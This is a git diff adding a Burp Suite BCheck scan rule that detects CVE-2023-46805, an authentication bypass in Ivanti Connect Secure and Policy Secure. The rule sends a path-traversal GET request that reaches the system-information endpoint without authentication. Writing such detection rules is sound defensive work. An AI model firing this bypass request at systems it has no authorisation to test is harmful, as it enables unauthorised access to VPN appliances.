diff --git a/vulnerabilities-CVEd/CVE-2023-46805-Ivanti Auth Bypass.bcheck b/vulnerabilities-CVEd/CVE-2023-46805-Ivanti Auth Bypass.bcheck
new file mode 100644
index 0000000..83f2b31
--- /dev/null
+++ b/vulnerabilities-CVEd/CVE-2023-46805-Ivanti Auth Bypass.bcheck	
@@ -0,0 +1,27 @@
+# https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/
+# https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis
+
+metadata:
+    language: v2-beta
+    name: "CVE-2023-46805 - Ivanti Connect Secure and Ivanti Policy Secure Authentication Bypass"
+    description: "Checks for CVE-2023-46805"
+    author: "trikster"
+    tags: "CVE-2023-46805", "cve", "auth-bypass", "ivanti"
+
+
+given host then
+    send request called check:
+        method: "GET"
+        path: "/api/v1/totp/user-backup-code/../../system/system-information"
+
+    if {check.response.status_code} is "200" and
+        "Content-Type: application/json" in {check.response.headers} and
+        {check.response.body} matches "(?m)\s*\{\s*\"software-inventory\"\s*:\s*\{\s*\"software\"\s*:\s*\{\s*\"name\"\s*:\s*\"\w+\"" then
+
+        report issue:
+            severity: high
+            confidence: firm
+            detail: "Application appears to be vulnerable to CVE-2023-46805."
+            remediation: "Apply vendor patches."
+
+    end if